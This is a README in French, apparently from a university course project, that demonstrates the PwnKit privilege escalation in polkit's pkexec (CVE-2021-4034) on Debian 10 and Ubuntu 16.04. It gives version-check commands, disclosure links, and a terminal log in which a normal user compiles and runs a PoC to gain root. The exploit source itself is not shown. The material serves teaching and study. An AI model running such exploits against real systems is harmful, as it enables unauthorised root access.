
Cours universitaire sur les vulnérabilités logicielles et leur atténuation, pour montrer l'exploitation et la remédiation causées par cette vulnérabilité.
Projet universitaire sur les vulnérabilités logicielles et leur atténuation, pour montrer l'exploitation et la correction causées par cette vulnérabilité. Nous avons utilisé pour cette expérience Ubunto version 16.04 LTS, ainsi que Debian 10.1.0 qui sera présenté dans l'expérience. La mise en place de l'environnement était essentielle car vous devez toujours vérifier la version sur laquelle vous travaillez pour être sûr qu'elle est vulnérable ou non. Commandes de vérification utilisées : dpkg -l | grep polkit, pkexec --version
PoC pour PwnKit : Vulnérabilité d'Élévation de Privilèges Locaux dans pkexec de polkit (CVE-2021-4034)
https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Vérifié sur Debian 10 et Ubunto 16.0.4
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)